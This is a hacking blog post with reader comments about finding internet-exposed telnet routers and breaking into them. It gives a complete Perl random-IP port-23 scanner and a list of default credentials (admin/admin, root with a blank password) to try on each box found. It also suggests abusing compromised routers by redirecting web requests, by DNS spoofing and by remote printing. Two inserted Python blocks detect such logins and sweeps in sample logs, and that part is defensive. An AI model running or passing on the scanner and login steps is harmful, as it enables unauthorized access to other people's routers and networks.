Telnet is a legacy remote-terminal TCP/IP application used for remote administration. It is notorious for transmitting communications in plain text and has long since been superseded by SSH, which uses encrypted channels, so it is rare to see Telnet in use on the Internet.
In this article I will explain how you can scan a large number of routers for telnet services, which we can then attempt to log in to using default credentials.
Hack Remote Routers Using Telnet
Things You Need:
1. Random telnet scanner, originally written by Solaris (modified by me). The program attempts to open a connection to the telnet port (23) of random IPs; if it succeeds, the program logs the success in a log file, telnet.txt, for later analysis. The program then repeats, so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet boxes. The program was originally written in Perl, but I have modified it into a batch file.
You can download the modified version of random telnet scanner from Here
and to get the password click Here
2. Telnet client
Windows XP and Linux users already have a telnet client by default, but Windows 7 users need to enable the telnet client by following these steps:
Go to Start -> Control Panel -> Programs and Features -> Turn Windows features on or off, then check Telnet Client and hit OK.
After that you can start Telnet from the Command Prompt (cmd).
Procedure
1. First run the remote telnet scanner for 20-30 minutes and you will end up with 10-20 telnet boxes.

2. You now have your list of IPs with the telnet port open in telnet.txt.
3. Now open your telnet client and connect to the IPs. You will be prompted for a username and password; try the common usernames and passwords like:
Admin - admin
Admin - "blank password"
Root - root
Root - "blank password"
A lot of routers disclose their model number in the telnet banner when you connect, so a simple Google search often turns up the default username and password. Otherwise move on to the next IP.
4. From here it's up to you what you do, but I enjoy using simple network tools like ipconfig and ping to map out the network; sometimes I have found routers that have nmap and telnet clients on them, etc. You can even port forward packets to printers and use them across the Internet to print out hundreds of copies. A funny concept that I have got to work in the past few days is with the routing tables and redirecting every web request to different sites.
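On the receiving device, step 3 shows up as a handful of logins with factory account names from an outside address, too few to trip a failure-count lockout. The Python below is an added example, not part of the original post, that triages authentication logs for that pattern. The log format, the device names and the 10.0.0.0/8 management range are constructed assumptions.

```python
"""Triage telnet logins that used a factory-default account name."""
import ipaddress
import re

DEFAULT_ACCOUNTS = {"admin", "root"}                   # names listed in the article's step 3
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed management range
LINE = re.compile(r"^\S+ (?P<dev>\S+) telnetd: (?P<event>LOGIN_OK|LOGIN_FAIL) "
                  r"user=(?P<user>\S*) from=(?P<src>\S+)$")

# Constructed log lines in an assumed format (not a real vendor's syslog output)
SAMPLE_LOG = """\
2024-05-01T11:00:01 rtr-lobby telnetd: LOGIN_FAIL user=admin from=203.0.113.50
2024-05-01T11:00:04 rtr-lobby telnetd: LOGIN_FAIL user=admin from=203.0.113.50
2024-05-01T11:00:09 rtr-lobby telnetd: LOGIN_OK user=root from=203.0.113.50
2024-05-01T11:05:00 rtr-core telnetd: LOGIN_OK user=netops from=10.0.0.15
2024-05-01T11:06:00 rtr-core telnetd: LOGIN_FAIL user=admin from=198.51.100.9
2024-05-01T11:06:03 rtr-core telnetd: LOGIN_FAIL user=root from=198.51.100.9
2024-05-01T11:07:00 rtr-lab telnetd: LOGIN_OK user=admin from=10.0.0.15
"""

def is_internal(addr):
    """True when addr parses and falls inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # an unparseable source is treated as untrusted
    return any(ip in net for net in INTERNAL_NETS)

def triage(log_text):
    """Return {(device, source): verdict} for events that used a default account name."""
    verdicts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["user"].lower() not in DEFAULT_ACCOUNTS:
            continue
        key = (m["dev"], m["src"])
        if m["event"] == "LOGIN_OK":
            # A success always wins over an earlier "probed" verdict for the same pair.
            verdicts[key] = "default-account-enabled" if is_internal(m["src"]) else "compromised"
        elif not is_internal(m["src"]):
            verdicts.setdefault(key, "probed")  # never downgrade an earlier success
    return verdicts

if __name__ == "__main__":
    for (device, source), verdict in triage(SAMPLE_LOG).items():
        print(f"{device:10} {source:15} {verdict}")
```

A "compromised" verdict means the device needs its credentials reset and its configuration reviewed; "default-account-enabled" marks devices where the factory account still works and telnet should be replaced with SSH.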
If the batch file is not working, please copy and paste the following code into Notepad and save it as router.pl. You also need ActivePerl to run this script.
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
    my $range1 = 223; # avoid experimental and multicast
    my $range2 = 254;
    $oct1 = int(rand($range1)) + 1; # generate random octets
    $oct2 = int(rand($range2)) + 1;
    $oct3 = int(rand($range2)) + 1;
    $oct4 = int(rand($range2)) + 1;
    if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){ # gets rid of loopbacks and private ips
        $ip = &ipgen(); # if local or private call again
    }else{
        $ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
    }
    return $ip; # return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){ # keeps code running indefinitely
    $target = &ipgen(); # get random ip to scan
    print "*??* SCANNING: $target \n"; # output
    my $sock = new IO::Socket::INET ( # try to create socket to chosen random address
        PeerAddr => $target,
        PeerPort => '23', # change this number to change ports you want to detect
        Proto => 'tcp',
        Timeout => '3', # you can get away with a timeout of 1 second but I use 3 to be safe
    );
    if($sock){ # if socket opened (port open)
        print "*!!* SUCCESS-: $target \n"; # print to screen
        open(DAT, ">>telnet.txt") || die("Cannot Open Output File"); # open results file
        print DAT "SUCCESS: $target \n"; # append findings to end of file
        close(DAT); # close the file
    }
    close($sock); # close the socket
}
#################################################################
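Seen from the network this script runs on, the loop above produces one host opening short-lived TCP/23 connections to many unrelated addresses, most of which never answer. The Python below is an added example, not part of the original post, that flags that pattern in flow records. The record format, the `SAMPLE_FLOWS` data and the thresholds are constructed assumptions.

```python
"""Flag hosts whose outbound TCP/23 traffic looks like a random telnet sweep."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed flow records (assumed format): time source destination dport result
SAMPLE_FLOWS = """\
2024-05-01T10:00:00 10.0.5.23 198.51.100.14 23 TIMEOUT
2024-05-01T10:00:03 10.0.5.23 203.0.113.77 23 TIMEOUT
2024-05-01T10:00:06 10.0.5.23 192.0.2.201 23 ESTABLISHED
2024-05-01T10:00:09 10.0.5.23 198.51.100.90 23 TIMEOUT
2024-05-01T10:00:12 10.0.5.23 203.0.113.5 23 RESET
2024-05-01T10:01:00 10.0.7.8 192.0.2.10 23 ESTABLISHED
2024-05-01T10:20:00 10.0.7.8 192.0.2.10 23 ESTABLISHED
2024-05-01T10:02:00 10.0.9.2 198.51.100.14 443 ESTABLISHED
"""

def parse_flows(text):
    """Yield (time, src, dst, result) for five-field telnet (dport 23) records."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[3] != "23":
            continue  # other ports and short or long lines are ignored
        yield datetime.fromisoformat(parts[0]), parts[1], parts[2], parts[4]

def detect_telnet_sweeps(text, window=timedelta(minutes=5), min_targets=5):
    """Return {src: report} for sources that reach min_targets distinct hosts in one window."""
    by_src = defaultdict(list)
    for ts, src, dst, result in parse_flows(text):
        by_src[src].append((ts, dst, result))
    findings = {}
    for src, events in by_src.items():
        events.sort()
        in_window, start, peak = Counter(), 0, 0
        for ts, dst, _ in events:
            in_window[dst] += 1
            while ts - events[start][0] > window:  # drop events older than the window
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= min_targets:
            failed = sum(1 for _, _, r in events if r != "ESTABLISHED")
            findings[src] = {"peak_targets": peak,
                             "failure_ratio": round(failed / len(events), 2),
                             "responders": sorted({d for _, d, r in events if r == "ESTABLISHED"})}
    return findings
```

A host that talks to one telnet server repeatedly (10.0.7.8 in the sample) is not flagged; only fan-out to many distinct destinations within the window is.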
I'll try this over the weekend, this looks like a cool project. Thanks.
The file just opens and closes...
I activated TELNET on my WINDOWS 7.
But it just keeps the same... :/
The scanner you have modified doesn't run as it states its evaluation license is expired??
Can you modify the Perl script above to generally check admin or root passwd for every host scanned? Thx bro
Can I access that Router Connected Computer files? Please help me. Thanks.
@e-සිහිනය
I can't understand what you are asking. Please be more elaborate.
@Yashas h.r.
Once you break into a router there are many things that you can do; it depends on the router. The simple thing that you can do is DNS spoofing.